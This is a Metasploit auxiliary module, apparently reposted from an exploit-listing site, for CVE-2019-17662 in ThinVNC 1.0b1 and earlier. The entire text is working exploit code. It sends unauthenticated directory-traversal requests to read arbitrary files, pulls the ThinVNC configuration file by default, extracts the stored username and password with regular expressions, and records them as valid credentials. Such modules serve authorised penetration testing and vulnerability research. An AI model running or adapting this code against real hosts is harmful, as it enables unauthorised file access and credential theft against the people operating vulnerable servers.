Share
## https://sploitus.com/exploit?id=PACKETSTORM:181165
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'ThinVNC Directory Traversal',  
'Description' => %q{  
This module exploits a directory traversal vulnerability in ThinVNC  
versions 1.0b1 and prior which allows unauthenticated users to retrieve  
arbitrary files, including the ThinVNC configuration file.  
  
This module has been tested successfully on ThinVNC versions 1.0b1  
and "ThinVNC_Latest" (2018-12-07).  
},  
'References' =>  
[  
['CVE', '2019-17662'],  
['URL', 'https://github.com/bewest/thinvnc/issues/5'],  
['URL', 'https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py'],  
['URL', 'https://redteamzone.com/ThinVNC/']  
],  
'Author' =>  
[  
'jinxbox', # Discovery and PoC  
'WarMarX', # PoC  
'bcoles' # metasploit  
],  
'DefaultOptions' => { 'RPORT' => 8080 },  
'DisclosureDate' => '2019-10-16',  
'License' => MSF_LICENSE  
))  
  
register_options(  
[  
OptString.new('FILEPATH', [true, 'The path to the file to read', 'ThinVnc.ini']),  
OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 2])  
])  
end  
  
def run_host(ip)  
depth = datastore['DEPTH']  
filepath = datastore['FILEPATH']  
  
res = retrieve_file(depth, filepath)  
  
return if res.blank?  
  
filename = File.basename(filepath)  
  
path = store_loot(  
'thinvnc.traversal',  
'text/plain',  
ip,  
res.to_s,  
filename  
)  
  
print_good("File #{filename} saved in: #{path}")  
  
# Report vuln and store creds if we successfully retrieved the config file  
if filename.downcase == 'thinvnc.ini' && res.to_s.start_with?('[Authentication]')  
report_service(  
:host => ip,  
:port => rport,  
:sname => (ssl ? 'https' : 'http'),  
:info => 'ThinVNC'  
)  
  
report_vuln(  
:host => ip,  
:port => rport,  
:proto => 'tcp',  
:sname => (ssl ? 'https' : 'http'),  
:name => 'ThinVNC Directory Traversal',  
:info => 'ThinVNC Directory Traversal',  
:refs => self.references  
)  
  
username = res.scan(/^User=(.+)$/).flatten.first.to_s.strip  
password = res.scan(/^Password=(.+)$/).flatten.first.to_s.strip  
  
if username && password  
print_good "Found credentials: #{username}:#{password}"  
store_valid_credential(user: username, private: password)  
end  
end  
end  
  
def retrieve_file(depth, filepath)  
traversal = Rex::Text.rand_text_alphanumeric(3..5)  
traversal << '/'  
traversal << '../' * depth  
traversal << filepath  
  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, traversal)  
})  
  
unless res  
vprint_error 'No reply'  
return  
end  
  
if res.code == 404  
vprint_error 'File not found'  
return  
end  
  
if res.code != 200  
vprint_error 'Unexpected reply'  
return  
end  
  
res.body.to_s  
end  
end